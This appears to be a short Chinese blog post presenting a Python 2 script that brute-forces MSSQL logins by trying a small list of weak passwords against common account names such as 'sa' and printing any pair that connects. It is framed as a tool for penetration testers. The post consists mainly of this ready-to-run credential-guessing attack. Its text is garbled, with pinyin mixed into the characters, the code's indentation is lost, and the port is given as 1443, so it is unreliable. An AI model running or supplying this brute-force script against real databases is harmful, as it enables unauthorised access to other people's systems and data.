Mssql Python版本爆破小腳本,需要安裝 MSSQL-python.exe 可以看出代碼量很少,用法:保存代碼為MssqlDatabaseBlasting.py,cmd切換到 MssqlDatabaseBlasting.py路徑下,并 執(zhí)行 MssqlDatabaseBlasting.py即可開始破解
import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密碼字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#賬號字典
success = False
host = "127.0.0.1"#數(shù)據(jù)庫IP地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try:
db = pymssql.connect(server=host, port=port, user=username, password=password)
success = True
if success:
print username, password
except Exception, e:
pass
說明:看到很多網(wǎng)絡(luò)安全愛好者,在進行滲透測試的時候,遇到數(shù)據(jù)庫可以遠程管理,但是無法破解其賬號密碼,所以此篇文章就推送幾個腳本進行滲透。